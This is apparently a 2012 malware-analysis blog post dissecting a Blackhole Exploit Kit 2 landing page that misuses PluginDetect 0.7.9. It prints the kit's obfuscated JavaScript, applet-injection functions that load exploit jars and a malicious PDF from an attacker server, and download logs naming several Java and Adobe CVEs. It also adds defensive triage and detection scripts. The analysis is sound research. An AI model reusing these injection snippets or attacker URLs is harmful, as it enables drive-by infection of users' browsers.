I came across PluginDetect 0.7.9 usage in BHEK2 recently. The PluginDetect 0.7.9 software was released today with the following details:

PluginDetect Library version: 0.7.9
released: 10/17/2012
by Eric Gerds

You can see it yourself on its website here --->>[CLICK]
Or see the capture of the site below.

If you click the "Download PluginDetect" menu on the left side, you'll see a JavaScript generator for PluginDetect, as per the picture below:

After you choose your options for which browser components to detect, this generator applet will burp out a JavaScript code result like the one below:

↑If you look closely at the marked part of the code you will recognize it as our old friend PluginDetect, as used by BlackHole Exploit Kit v2 / BHEK2. PluginDetect is actually a useful, good piece of code for building browser detection, however BHEK2 and other EKs are misusing it for bad purposes.

We know that BHEK2 was previously using PluginDetect 0.7.8, but today I bumped into an infector using PluginDetect 0.7.9 with CVE-2012-5076, and below is the story:

Hinted by our @Hulk_Crusader, we investigated an infector site at: fi.mattlemons.org
It contains a lot of infector links, as per the snippet below:

Name Last modified Size
------------------------------------------------
Jssl.php 16-Nov-2012 05:52 73K
aVhg.html 11-Nov-2012 06:21 391
bVhg.html 11-Nov-2012 06:21 611
bablo5.php 16-Nov-2012 16:05 67
bind.php 11-Nov-2012 07:24 12K
faqPkOE.php 11-Nov-2012 07:32 8.2K
favicon.gif 05-Sep-2011 14:17 0
favicon.ico 05-Sep-2011 14:17 0
index.main.php 16-Nov-2012 05:47 4.0K
info.php 16-Nov-2012 05:49 34K
jorik5.php 16-Nov-2012 16:05 74
joy.php 16-Nov-2012 05:49 5.5K
mainEFjd.php 16-Nov-2012 05:49 8.2K
mainVjH.php 16-Nov-2012 05:49 8.2K
page8.htm 16-Nov-2012 15:11 1.0K
rVhg.html 11-Nov-2012 06:21 744
sVhg.html 11-Nov-2012 06:21 664
seo4.php 16-Nov-2012 16:05 70
sitemapl82.php 16-Nov-2012 05:50 8.2K
stylecss.php 16-Nov-2012 05:51 24K
system_file.php 16-Nov-2012 15:11 71
topsale5.php 16-Nov-2012 16:05 67
w11292880n.php 16-Nov-2012 05:51 24K
w11384180n.php 16-Nov-2012 05:52 24K
w11884808n.php 16-Nov-2012 05:53 24K
w11991996n.php 16-Nov-2012 05:53 24K
w12272200n.php 16-Nov-2012 05:54 24K
w12745201n.php 09-Nov-2012 06:54 303K <=== suspicious
w14074084n.php 16-Nov-2012 05:54 92K
w14137042n.php 16-Nov-2012 05:54 92K
w14455434n.php 16-Nov-2012 05:55 24K
w15104461n.php 16-Nov-2012 05:56 70K
w16762030n.php 16-Nov-2012 05:56 24K
w17886614n.php 16-Nov-2012 05:56 70K
w18956554n.php 16-Nov-2012 05:57 24K
w19446592n.php 16-Nov-2012 05:58 24K
w19572944n.php 16-Nov-2012 05:58 24K
w20687587n.php 16-Nov-2012 05:58 24K
w21108783n.php 16-Nov-2012 05:58 24K
w22312966n.php 16-Nov-2012 06:00 24K
w24463996n.php 16-Nov-2012 06:00 24K
w24813801n.php 16-Nov-2012 06:02 24K
w24912540n.php 16-Nov-2012 06:03 24K
w25181459n.php 16-Nov-2012 06:05 24K
w25516725n.php 16-Nov-2012 06:05 92K
w26388892n.php 09-Nov-2012 06:37 297K <=== suspicious
w26953552n.php 16-Nov-2012 06:07 92K
w27341032n.php 16-Nov-2012 06:08 24K
w27711058n.php 16-Nov-2012 06:10 24K
w27944845n.php 16-Nov-2012 06:11 24K
w29438343n.php 16-Nov-2012 12:36 23K
w32104720n.php 16-Nov-2012 12:36 23K
w32403343n.php 16-Nov-2012 12:36 23K
w32844482n.php 16-Nov-2012 12:36 23K
w33118612n.php 16-Nov-2012 12:36 23K
w33764801n.php 16-Nov-2012 12:36 23K
w36011284n.php 16-Nov-2012 12:36 23K
w36584950n.php 09-Nov-2012 07:36 138K <=== suspicious
w37531540n.php 16-Nov-2012 12:36 23K
w37715594n.php 16-Nov-2012 12:36 23K
w37727072n.php 16-Nov-2012 12:36 23K
w38297236n.php 16-Nov-2012 12:36 23K
w38994382n.php 16-Nov-2012 12:36 23K
w39565125n.php 16-Nov-2012 12:36 23K
w39715194n.php 16-Nov-2012 12:36 23K
w41352222n.php 16-Nov-2012 12:36 23K
w42271663n.php 16-Nov-2012 12:36 92K
w42595965n.php 16-Nov-2012 12:36 23K
w43085485n.php 16-Nov-2012 12:36 23K
w43584820n.php 16-Nov-2012 12:36 23K
w45042947n.php 16-Nov-2012 12:36 23K
w48788700n.php 16-Nov-2012 12:36 23K
w49496620n.php 16-Nov-2012 12:36 23K
w49977014n.php 16-Nov-2012 12:36 23K
w51693290n.php 16-Nov-2012 12:36 23K
w52354703n.php 16-Nov-2012 12:36 23K
w54253689n.php 16-Nov-2012 12:36 23K
w54406687n.php 16-Nov-2012 12:36 23K
w54854224n.php 16-Nov-2012 12:36 23K
w54924852n.php 16-Nov-2012 12:36 23K
w55756681n.php 16-Nov-2012 12:36 23K
w56926790n.php 16-Nov-2012 12:36 69K
w57142260n.php 16-Nov-2012 12:36 23K
w57288477n.php 16-Nov-2012 12:36 160K <=== suspicious
w57363423n.php 16-Nov-2012 12:36 23K
w57574466n.php 16-Nov-2012 12:36 23K
w58386696n.php 16-Nov-2012 12:36 23K
w58414355n.php 16-Nov-2012 12:36 69K
w58824744n.php 16-Nov-2012 12:36 23K
w59182790n.php 16-Nov-2012 12:36 23K
w59615462n.php 16-Nov-2012 12:36 69K
w59702531n.php 16-Nov-2012 12:36 23K
w60326763n.php 09-Nov-2012 04:22 275K <=== suspicious
w61856170n.php 16-Nov-2012 12:36 23K
w62088643n.php 09-Nov-2012 07:38 161K <=== suspicious
w64137644n.php 16-Nov-2012 12:36 115K <=== suspicious
w64214598n.php 16-Nov-2012 12:36 69K
w64908493n.php 16-Nov-2012 12:36 23K
w64956301n.php 16-Nov-2012 12:36 23K
w65944817n.php 16-Nov-2012 12:36 92K
w65994077n.php 16-Nov-2012 12:36 23K
w66442417n.php 16-Nov-2012 12:36 23K
w67063022n.php 16-Nov-2012 12:36 23K
w67424797n.php 16-Nov-2012 12:36 69K
w68083912n.php 16-Nov-2012 12:36 92K
w68562749n.php 16-Nov-2012 12:36 23K
w69423332n.php 16-Nov-2012 12:36 23K
w69863913n.php 16-Nov-2012 12:36 115K <=== suspicious
w71004261n.php 16-Nov-2012 12:36 23K
w71254201n.php 16-Nov-2012 12:36 23K
w71703411n.php 16-Nov-2012 12:36 23K
w72627688n.php 16-Nov-2012 12:36 23K
w74483378n.php 16-Nov-2012 12:36 23K
w75274537n.php 16-Nov-2012 12:36 115K <=== suspicious
w78731488n.php 16-Nov-2012 12:36 92K
w80343543n.php 16-Nov-2012 12:36 160K <=== suspicious
w80903025n.php 09-Nov-2012 05:28 297K <=== suspicious
w81115093n.php 16-Nov-2012 12:36 23K
w81417750n.php 16-Nov-2012 12:36 23K
w82277330n.php 16-Nov-2012 12:36 69K
w82347261n.php 16-Nov-2012 12:36 23K
w84467943n.php 16-Nov-2012 12:36 23K
w85902715n.php 16-Nov-2012 12:36 69K
w86577171n.php 16-Nov-2012 12:36 23K
w86771427n.php 16-Nov-2012 12:36 23K
w86911411n.php 16-Nov-2012 12:36 23K
w86982141n.php 16-Nov-2012 12:36 92K
w87326315n.php 16-Nov-2012 12:36 23K
w88145056n.php 16-Nov-2012 12:36 92K
w88205733n.php 16-Nov-2012 12:36 137K <=== suspicious
w88685477n.php 16-Nov-2012 12:36 23K
w89338108n.php 16-Nov-2012 12:36 23K
w89476290n.php 16-Nov-2012 12:36 137K <=== suspicious
w89705559n.php 16-Nov-2012 12:36 23K
wp-conf.php 15-Nov-2012 22:26 185K <=== suspicious

*) I marked the suspicious files above ↑. I bet they are trojan malwares! (Hint: see the size of the files)

Sadly the web server is well tuned & using an ACL to block access, so we successfully fetched only some files, as per below:

aVhg.html 2a3e59f3088c06329e01acc3f4392e6f
bablo5.php 0423f6942706d9b36fc5551b472f12d9
jorik5.php 6e1a175421632987e00a589a93653e56
seo4.php 89cfb895e3381c2f174ef24e8c664839
topsale5.php 5e9eb5ddf71e1b4c56375c85aae92c69
page8.htm 57f31d9fc68cc28f1051028d761d8afc

All ↑files are mostly spam redirectors, but page8.htm contains malicious code:

Which we decoded easily to be like this:

↑Which is showing a malicious URL of the BHEK pattern. Shortly after, we fetched it, & by the TCP/HTTP data we can be sure it is a BHEK:

--21:17:54-- h00p://203.80.16.81:8080/forum/links/column.php
Connecting to 203.80.16.81:8080... seconds 0.00, connected.
Created socket 1920.
---request begin---
GET /forum/links/column.php HTTP/1.0
Referer: h00p://fi.mattlemons.org/page8.htm
User-Agent: MalwareMustDie is knocking on your door |-(
Accept: */*
Host: 203.80.16.81:8080
Connection: Keep-Alive
---request end---
HTTP request sent, awaiting response...
---response begin---
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Sat, 17 Nov 2012 20:40:41 GMT
Content-Type: text/html; charset=CP-1251
Connection: close
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
---response end---
200 OK
Length: unspecified [text/html]
Closed fd 1920
21:17:56 (43.56 KB/s) - `column.php' saved [31778]

The downloaded file contains condensed JavaScript, as per the snipped code below:

<html><head><title></title></head><body><script>try{if(window.document)window.document.body="asd"}catch(e
{var PluginDetect={version:"0.7.9",name:"PluginDetect",handler:function(c,b,a){return function(){c(b,a)}}
nction(b){return(typeof b=="string"&&(/\d/).test(b))},getNumRegx:/[\d][\d\.\_,-]*/,splitNumRegx:/[\.\_,-]
umRegx);b=f.split(e.splitNumRegx);for(a=0;a<Math.min(c.length,b.length);a++){if(g(c[a],10)>g(b[a],10)){re
test(e[a])){e[a]="0"}}return e.slice(0,4).join(",")},$$hasMimeType:function(a){return function(c){if(!a.i
j.isDefined(e)||e)?/\d/:0,k=c?new RegExp(c,"i"):0,a=navigator.plugins,g="",f,b,m;for(f=0;f<a.length;f++){
(m,"i"),h="",g=c?new RegExp(c,"i"):0,a,l,d,j=e.isString(k)?[k]:k;for(d=0;d<j.length;d++){if((f=e.hasMimeT
);b=h.formatNum(b);d=b.split(h.splitNumRegx);g=e.split(h.splitNumRegx);for(a=0;a<d.length;a++){if(c>-1&&a
if(g.length>0&&!f[g]){f[g]=f[a](f);delete f[a]}}catch(d){}}}},initObj:function(e,b,d){var a,c;if(e){if(e[...

You can see the full original code in our pastebin -->>[PASTEBIN]
And a nice readable version of the code can be seen here -->>[PASTEBIN]

Looking closely at the decoded code, we can see the PluginDetect 0.7.9 logic is used in it. The EK coder is misusing the PluginDetect 0.7.9 base code for infection purposes.
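The "look at the size of the files" hint on the directory listing above can be turned into a small triage script. The code below is an added example, not code from the original post: it parses Apache-style autoindex lines, takes the median size of the directory as the baseline for the "normal" pages, and flags everything well above it, also noting when a flagged file was modified on a different date than the bulk. SAMPLE_LISTING is constructed from entries quoted in the post, and the 4x-median factor is an assumption; tune it per directory.

```javascript
// Added example (not from the original post): size-based triage of an
// Apache-style autoindex listing, the "look at the size of the files"
// heuristic applied to the fi.mattlemons.org listing above.
// SAMPLE_LISTING is constructed from entries quoted in the post;
// the 4x-median threshold is an assumption.

const SAMPLE_LISTING = `
Name Last modified Size
------------------------------------------------
favicon.ico 05-Sep-2011 14:17 0
page8.htm 16-Nov-2012 15:11 1.0K
w11292880n.php 16-Nov-2012 05:51 24K
w12745201n.php 09-Nov-2012 06:54 303K
w14074084n.php 16-Nov-2012 05:54 92K
w26388892n.php 09-Nov-2012 06:37 297K
w29438343n.php 16-Nov-2012 12:36 23K
w32104720n.php 16-Nov-2012 12:36 23K
w36584950n.php 09-Nov-2012 07:36 138K
w37531540n.php 16-Nov-2012 12:36 23K
w56926790n.php 16-Nov-2012 12:36 69K
w57288477n.php 16-Nov-2012 12:36 160K
w64137644n.php 16-Nov-2012 12:36 115K
w71004261n.php 16-Nov-2012 12:36 23K
w78731488n.php 16-Nov-2012 12:36 92K
w81115093n.php 16-Nov-2012 12:36 23K
w86577171n.php 16-Nov-2012 12:36 23K
w89705559n.php 16-Nov-2012 12:36 23K
wp-conf.php 15-Nov-2012 22:26 185K
`;

// Convert an autoindex size column ("391", "8.2K", "1.0M") to bytes.
function parseSize(s) {
  const m = /^(\d+(?:\.\d+)?)([KMG]?)$/i.exec(s);
  if (!m) return null;
  const mult = { '': 1, K: 1024, M: 1024 ** 2, G: 1024 ** 3 }[m[2].toUpperCase()];
  return Math.round(parseFloat(m[1]) * mult);
}

// Parse "name  dd-Mon-yyyy  hh:mm  size" lines; the header and the
// separator line are skipped because they do not match the pattern.
function parseListing(text) {
  const entries = [];
  for (const line of text.split('\n')) {
    const m = /^(\S+)\s+(\d{2}-[A-Za-z]{3}-\d{4})\s+(\d{2}:\d{2})\s+(\S+)/.exec(line.trim());
    if (!m) continue;
    const size = parseSize(m[4]);
    if (size !== null) entries.push({ name: m[1], date: m[2], size });
  }
  return entries;
}

function median(nums) {
  const a = [...nums].sort((x, y) => x - y);
  const mid = Math.floor(a.length / 2);
  return a.length % 2 ? a[mid] : (a[mid - 1] + a[mid]) / 2;
}

// Flag files larger than `factor` times the median size of the listing and
// note when a flagged file was also modified on a date unlike the bulk of
// the directory. Results are sorted by size, largest first.
function triageListing(text, factor = 4) {
  const entries = parseListing(text);
  if (entries.length === 0) return [];
  const med = median(entries.map(e => e.size));
  const byDate = {};
  for (const e of entries) byDate[e.date] = (byDate[e.date] || 0) + 1;
  const bulkDate = Object.keys(byDate).sort((a, b) => byDate[b] - byDate[a])[0];
  return entries
    .filter(e => e.size > factor * med)
    .sort((a, b) => b.size - a.size)
    .map(e => {
      const reasons = [`size is ${(e.size / med).toFixed(1)}x the median`];
      if (e.date !== bulkDate) reasons.push(`modified ${e.date}, bulk is ${bulkDate}`);
      return { name: e.name, size: e.size, reasons };
    });
}

for (const hit of triageListing(SAMPLE_LISTING)) {
  console.log(hit.name, hit.size, hit.reasons.join('; '));
}
```

On the constructed sample the median is 24K, so the 92K pages stay under the bar while the 115K and larger files are reported, which matches the files marked suspicious in the listing; the three 09-Nov files additionally get the "modified on a different date" reason, which is often the stronger signal on a compromised host.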
And since PluginDetect 0.7.9 was released officially it has already been used by infectors. Compared to the BHEK2 with the previous PluginDetect 0.7.8, this version is using a similar method, however some changes were detected, as per the following summary:

Provided exploits (the ActiveX/COM objects referenced by the code):
Msxml2.XMLHTTP
Msxml2.DOMDocument
Microsoft.XMLDOM
ShockwaveFlash.ShockwaveFlash
TDCCtl.TDCCtl
Shell.UIHelper
Scripting.Dictionary
wmplayer.ocx

Browser access: accepting only access from these platform/User-Agent strings ;-))
"Win", "Mac", "Linux", "FreeBSD", "iPhone", "iPod", "iPad", "Win.*CE", "Win.*Mobile", "Pocket\s*PC"

Strictly gets the version info values of the browser engine versions...

d.isGecko=(/Gecko/i).test(k)&&(/Gecko\s*\/\s*\d/i).test(l);
d.verGecko=d.isGecko?d.formatNum((/rv\s*\:\s*([\.\,\d]+)/i).test(l)?RegExp.$1:"0.9"):null;
d.isChrome=(/Chrome\s*\/\s*(\d[\d\.]*)/i).test(l);
d.verChrome=d.isChrome?d.formatNum(RegExp.$1):null;
d.isSafari=((/Apple/i).test(j)||(!j&&!d.isChrome))&&(/Safari\s*\/\s*(\d[\d\.]*)/i).test(l);
d.verSafari=d.isSafari&&(/Version\s*\/\s*(\d[\d\.]*)/i).test(l)?d.formatNum(RegExp.$1):null;
d.isOpera=(/Opera\s*[\/]?\s*(\d+\.?\d*)/i).test(l);
d.verOpera=d.isOpera&&((/Version\s*\/\s*(\d+\.?\d*)/i).test(l)||1)?parseFloat(RegExp.$1,10):null;
d.addWinEvent("load",d.handler(d.runWLfuncs,d))

Infector plugins:
1. Java Exploit
mimeType:["application/x-java-applet","application/x-java-vm","application/x-java-bean"],
classID:"clsid:8AD9C840-044E-11D1-B3E9-00805F499D93"

Aimed at a generic exploit affecting the Java versions below:
[1,9,1,40] [1,8,1,40] [1,7,1,40] [1,6,0,40] [1,5,0,30] [1,4,2,30] [1,3,1,30]

Also provided special handling for the specific Java versions below:
k=[1,5,0,14], j=[1,6,0,2], h=[1,3,1,0], g=[1,4,2,0], f=[1,5,0,7]

2. Flash Exploit
mimeType:"application/x-shockwave-flash",progID:"ShockwaveFlash.ShockwaveFlash",classID:"clsid:D27CDB6E-AE6D-11CF-96B8-444553540000"

Replacing the downloaded object by this into an exe in locals...
return e?e[0].replace(/[rRdD\.]/g,",").replace(/\s/g,""):null

3. Adobe Reader
mimeType:"application/pdf",navPluginObj:null,progID:["AcroPDF.PDF","PDF.PdfCtrl"],classID:"clsid:CA8A9780-280D-11CF-A24D-444553540000"

The logic to check the Adobe version is:
if(pdfver[0]>0&&pdfver[0]<8)
(pdfver[0]==8||(pdfver[0]==9&&pdfver[1]<4)

//Hint! [Important!] New: makeSense function
We detected a new control called the makeSense() function to check the PDF & Java versions; it uses the applet code below to get & pass the version & vendor info as parameters:

import java.applet.Applet;

public class A extends Applet {
  public String getAppVersion() {
    return "3";
  }

  public String getProp(String paramString) {
    String str = "";
    try {
      if ((paramString instanceof String))
        str = System.getProperty(paramString);
    } catch (Exception localException) {
    }
    return str;
  }

  public String getVersion() {
    return getProp("java.version");
  }

  public String getVendor() {
    return getProp("java.vendor");
  }

  public void statusbar(String paramString) {
    try {
      if ((paramString instanceof String))
        showStatus(paramString);
    } catch (Exception localException) {
    }
  }
}

Let's go back to our case. This infection uses PluginDetect 0.7.9, so if we hit the j1 and j2 parameters correctly there are 2 (two) jar malware downloads, as per the code below:

function j1() {
  var d=document.createElement("div");
  d.innerHTML = '<applet archive="../data/spn2.jar" code="impossibla"> <param name="val" value="0b0909041f"/> <param name="prime" value="3131271c083c181c3c37343c18371f181c181c312c174421233143323a11193138174321233a3c040b043d112c39081c1f373a1f37321f37321f080802043539270e1f37111f37231f08271f08081f37111f37111f08371f37361f3717020139372c02170e392802382c390b"/></applet>';
  document.body.appendChild(d);
  return true;
}

function j2() {
  var d=document.createElement("div");
  d.innerHTML = '<applet archive="../data/spn.jar" code="impossibla"> <param name="val" value="0b0909041f"/>< param name="prime" value="3131271c083c181c3c37343c18371f181c181c312c174421233143323a11193138174321233a3c040b043d112c39081c1f373a1f37321f37321f080802043539270e1f37111f37231f08271f08081f37111f37111f08371f37361f3717020139370502170e392802382c390b"/></applet>';
  document.body.appendChild(d);
  return true;
}

Tracing the path, we get the jars as below:

--00:25:07-- h00p://203.80.16・81:8080/forum/data/spn.jar
=> `spn.jar'
Connecting to 203.80.16・81:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 12,745 (12K) [application/java-archive]
00:25:09 (37.62 KB/s) - `spn.jar' saved [12745/12745]

--00:25:14-- h00p://203.80.16・81:8080/forum/data/spn2.jar
=> `spn2.jar'
Connecting to 203.80.16・81:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 21,607 (21K) [application/java-archive]
00:25:16 (49.66 KB/s) - `spn2.jar' saved [21607/21607]

These files are Java exploiters. There is abuse code of java.lang.String.inter CVE-2012-5076 in "spn.jar" and also CVE-2012-4681 & CVE-2012-1723 in "spn2.jar", used to exploit + download the payload. We will soon be discussing these exploits.
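For anyone who wants to spot this landing page in captured web content rather than by hand, here is an added example that is not code from the original post, PluginDetect, or the kit: a scanner that scores an HTML/JS body against the markers described in this post (the PluginDetect 0.7.9 library, the Java/Flash class IDs, the pdfver probe, an applet injected through innerHTML with long hex "val"/"prime" parameters, and an iframe whose query values are colon-separated tokens like the p1() iframe shown further down). The two sample pages are constructed from fragments quoted in the post with the hex blobs shortened; the rule weights and the threshold are assumptions. The benign sample shows why the library name alone must not be the trigger: PluginDetect is a legitimate library, and it is the applet and iframe injection around it that marks the kit.

```javascript
// Added example (not code from the original post, nor from PluginDetect or
// BHEK): score fetched HTML/JS against the landing-page markers this post
// describes. SAMPLE_LANDING and SAMPLE_BENIGN are constructed from fragments
// quoted in the post (hex params shortened); weights/threshold are assumptions.

const RULES = [
  { id: 'plugindetect-lib', weight: 2, re: /name\s*:\s*["']PluginDetect["']/ },
  { id: 'plugindetect-0.7.9', weight: 1, re: /version\s*:\s*["']0\.7\.9["']/ },
  { id: 'java-plugin-clsid', weight: 1, re: /clsid:8AD9C840-044E-11D1-B3E9-00805F499D93/i },
  { id: 'flash-clsid', weight: 1, re: /clsid:D27CDB6E-AE6D-11CF-96B8-444553540000/i },
  { id: 'pdfver-probe', weight: 1, re: /\bpdfver\b/ },
  // applet injected through innerHTML, loading a jar from a relative archive path
  { id: 'applet-via-innerhtml', weight: 3, re: /innerHTML\s*=\s*["']<applet[^>]*\barchive=/i },
  // long hex blobs handed to the applet as "val"/"prime" parameters
  { id: 'hex-applet-param', weight: 2, re: /<param\s+name=["'](?:val|prime)["']\s+value=["'][0-9a-f]{8,}["']/i },
  // iframe whose query values are colon-separated base-N tokens, as in p1()
  { id: 'iframe-encoded-query', weight: 2, re: /<iframe[^>]*\?[^"'>]*=(?:[0-9a-z]+:){3,}[0-9a-z]+/i },
];

const THRESHOLD = 5; // assumption: library + version alone (3) must not fire

// Returns the rule ids that fired, the weighted score and a verdict.
function scanPage(html) {
  const fired = RULES.filter(r => r.re.test(html));
  const score = fired.reduce((s, r) => s + r.weight, 0);
  return {
    hits: fired.map(r => r.id),
    score,
    verdict: score >= THRESHOLD ? 'likely-ek-landing-page' : 'no-match',
  };
}

// Constructed from the j1() and p1() snippets quoted in the post.
const SAMPLE_LANDING = `<html><head><title></title></head><body><script>
var PluginDetect={version:"0.7.9",name:"PluginDetect"};
var pdfver=[9,1,0];
function j1() { var d=document.createElement("div");
d.innerHTML = '<applet archive="../data/spn2.jar" code="impossibla">'
 + '<param name="val" value="0b0909041f"/>'
 + '<param name="prime" value="3131271c083c181c3c37343c18371f18"/></applet>';
document.body.appendChild(d); return true; }
function p1() { var d=document.createElement("div");
d.innerHTML = "<iframe src=\\"/forum/links/column.php?xrdbmuu=30:1n:1i:1i:33&sckq=39:2v:2v\\"></iframe>";
document.body.appendChild(d); }
</script></body></html>`;

// Constructed: a page that uses the library for its intended purpose.
const SAMPLE_BENIGN = `<html><body><script>
var PluginDetect={version:"0.7.9",name:"PluginDetect"};
if (PluginDetect.getVersion("Flash") === null) { document.write("no Flash"); }
</script></body></html>`;

console.log(scanPage(SAMPLE_LANDING));
console.log(scanPage(SAMPLE_BENIGN));
```

Run against proxy captures or a sandbox's saved responses, the hits array tells an analyst which components of the kit were present, and the score keeps a plain PluginDetect deployment (score 3 here) below the line.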
Some internet-operation strings in both files can be viewed soon, like:

* * * File: spn.jar
import java.net.URL;
41: invokevirtual 51 java/lang/Class:getResource (Ljava/lang/String;)Ljava/net/URL;
44: invokevirtual 55 java/net/URL:toString ()Ljava/lang/String;
103: new 56 java/net/URL
106: dup
107: aload 4
109: invokespecial 71 java/net/URL: (Ljava/lang/String;)V
137: checkcast 84 java/net/URLConnection
140: astore 6
142: aload 6
144: invokevirtual 86 java/net/URLConnection:getInputStream ()Ljava/io/InputStream;

* * * File: spn2.jar
import java.net.URL;
49: invokevirtual 232 java/lang/Class:getResource (Ljava/lang/String;)Ljava/net/URL;
52: invokevirtual 236 java/net/URL:toString ()Ljava/lang/String;
113: new 68 java/net/URL
116: dup
117: aload 5
119: invokespecial 70 java/net/URL: (Ljava/lang/String;)V
148: checkcast 260 java/net/URLConnection
151: astore 7
153: aload 7
155: invokevirtual 262 java/net/URLConnection:getInputStream ()Ljava/io/InputStream;

Below is the exploit CVE-2012-5076 code used in spn.jar:

And below is the CVE-2012-4681 used in spn2.jar to download the mess..

↑It is at the public static void impossibla(impossibld paramimpossibld) and in the public Object impossibla()

As advised by @Dr4g0nFlySm0k3, in "spn2.jar" at public class impossiblb we also detected CVE-2012-1723 exploit code, as per the snippet below (core code only):

PS: There is a quite long list of variables for gaining "type confusion" between a static & an instance variable for this exploit, and I snipped them all in the snapshot above; for more details please check the download sample files provided at the link at the bottom of the post.

[NEW] I was just mentioned on twitter, thanks to @PhysicalDrive0, that Java exploits always come in threes; below is the message:

These things always come in threes...spn/spn2/spn3.jar #JavaExploit #ExploitKit
— PhysicalDrive0 (@PhysicalDrive0) November 18, 2012

The first response I did was to re-read the PluginDetect 0.7.9 and be 100% sure that there is no sign of spn3.jar in there; next, I checked the last fetched spider logs.. couldn't find it either. But I just tried to download it by following the path of spn.jar & spn2.jar and....

--2012-11-18 22:14:07-- h00p://203.80.16.81:8080/forum/data/spn3.jar
Connecting to 203.80.16.81:8080... connected.
Created socket 3.
---request begin---
GET /forum/data/spn3.jar HTTP/1.1
Referer: h00p://fi.mattlemons.org/page8.htm
User-Agent: MalwareMustDie is knocking AGAIN on your door! |-((
Accept: */*
Host: 203.80.16.81:8080
Connection: Keep-Alive
---request end---
HTTP request sent, awaiting response...
---response begin---
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Sun, 18 Nov 2012 21:37:08 GMT
Content-Type: application/java-archive
Connection: keep-alive
Last-Modified: Mon, 22 Oct 2012 13:35:13 GMT
ETag: "1350005-521e-4cca5ec4d4640"
Accept-Ranges: bytes
Content-Length: 21022
---response end---
200 OK
Registered socket 3 for persistent reuse.
Length: 21022 (21K) [application/java-archive]
Saving to: `spn3.jar'
100%[=============>]21,022 43.2K/s in 0.5s
2012-11-18 22:14:08 (43.2 KB/s) - `spn3.jar' saved [21022/21022]

↑By God, there is a spn3.jar!! But why? Not being in PluginDetect means no chance for infection.. Here's the snapshot, ↓it shows the file's upload date...

-rw-r--r-- 1 xxx xxx 21022 Oct 22 22:35 spn3.jar
MD5 (spn3.jar) = 66c55d2cebc9d2d7b09a6e12b94fc1c9

So let's see what exploit it has inside. First, in the public class fewwebwegb it has CVE-2012-0507 ↓

Second, in the public class fewwebwegc it has CVE-2012-4681 exploit code ↓

↑These two exploits are double hitting the suspect's PC to break Java's privilege..

[NEW] There is also another file called "t.pdf", which is not written in the PluginDetect PoC (thanks again to PhysicalDrive0 for the hint), as below:

--01:39:46-- h00p://203.80.16.81:8080/forum/data/t.pdf
=> `t.pdf'
Connecting to 203.80.16.81:8080... seconds 0.00, connected.
Created socket 1920.
---request begin---
GET /forum/data/t.pdf HTTP/1.0
Referer: h00p://fi.mattlemons.org/page8.htm
User-Agent: MalwareMustDie Now BANGING at your Door ||-((
Accept: */*
Host: 203.80.16.81:8080
Connection: Keep-Alive
---request end---
HTTP request sent, awaiting response...
---response begin---
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Mon, 19 Nov 2012 01:02:39 GMT
Content-Type: application/pdf
Connection: keep-alive
Last-Modified: Fri, 14 Sep 2012 18:03:02 GMT
ETag: "13500e4-1fa7-4c9ad3c1e8180"
Accept-Ranges: bytes
Content-Length: 8103
---response end---
200 OK
Registered socket 1920 for persistent reuse.
Length: 8,103 (7.9K) [application/pdf]
01:39:47 (78.02 KB/s) - `t.pdf' saved [8103/8103]

$ ls -alF t.*
-rwx------ 1 xxx xxx 8103 Sep 14 09:03 t.pdf
$ md5 t.pdf
MD5 (t.pdf) = d1e2ff36a6c882b289d3b736d915a6cc

It is a common Pidief exploit shellcode downloader; with an invalid xref it calls the obfuscated code below to be extracted as shellcode,

0000000004 00000 f
0000000772 00000 n
0000001087 00000 n
0000001137 00000 n
0000000000 00000 f
0000000000 65535 f
0000001284 00000 n
:
:
0000035752 00000 n
0000036095 00000 n
0000000026 65535 f
0000000050 65535 f
0000000051 65535 f

This sample has the highest detection ratio compared to the other samples here:

MD5: d1e2ff36a6c882b289d3b736d915a6cc
File size: 7.9 KB ( 8103 bytes )
File name: t.pdf
File type: PDF
Tags: pdf acroform invalid-xref
Detection ratio: 22 / 43
URL: https://www.virustotal.com/file/1e9e19cc0e6c49f658f6205d19d3940698cbe22df6cdb149c8178857992473e7/analysis/

There is another p1 parameter, as per the code below, to drop one more malicious PDF:

function p1() {
  var d=document.createElement("div");
  d.innerHTML = "<iframe src=\"/forum/links/column.php?xrdbmuu="+x("c833f")+"&sckq="+x("laa")+"&bugeh=2v:1k:1m:32:33:1k:1k:31:1j:1o&hdulmrim="+x(pdfver.join("."))+"\"></iframe>";
  document.body.appendChild(d);
}

Decoding this PDF download URL wasn't hard; it took me 2 minutes to figure out the URL :-) Here's the proof:

--01:28:48-- h00p://203.80.16。81:8080/forum/links/column.php?xrdbmuu=30:1n:1i:1i:33&sckq=39:2v:2v&bugeh=2v:1k:1m:32:33:1k:1k:31:1j:1o&hdulmrim=1o:1d:1g:1d:1f
=> `column.php@xrdbmuu=30%3A1n%3A1i%3A1i%3A33&sckq=39%3A2v%3A2v&bugeh=2v%3A1k%3A1m%3A32%3A33%3A1k%3A1k%3A31%3A1j%3A1o&hdulmrim=1o%3A1d%3A1g%3A1d%3A1f'
Connecting to 203.80.16・81:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 27,788 (27K) [application/pdf]
01:28:50 (47.09 KB/s) - `column.php@xrdbmuu=30%3A1n%3A1i%3A1i%3A33&sckq=39%3A2v%3A2v&bugeh=2v%3A1k%3A1m%3A32%3A33%3A1k%3A1k%3A31%3A1j%3A1o&hdulmrim=1o%3A1d%3A1g%3A1d%3A1f' saved [27788/27788]

And here's my note on manually decoding:

a=x("c833f");
function x(s) { d=[]; for(i=0;i

In the PDF file at 0x3CD5 we can see this malicious code -->>[PASTEBIN]

↑We saw the string "parseInt(app.beep(0)).toString().substring(1,2)" is used 122 times :-) app.beep is a typical PDF function; the one-digit integer that results is the key. Example:

"30:1n:1i:1i:33"

a=x("laa");
function x(s) { d=[]; for(i=0;i
"39:2v:2v"

pdfver="9.1.0"
mypdf=(pdfver.join("."));
a=x(mypdf);
function x(s) { d=[]; for(i=0;i
"1o:1d:1g:1d:1f"

x="17777".toString().substring(1,2)
document.write(x); ===> "7"

↑Using the above hint, the deobfuscated code is --->>[PASTEBIN]

There is the exploit code of CVE-2009-0927 here:

And also an obfuscated shellcode here (see the var bjsg value):

The shellcode itself contains a "plain" download URL:

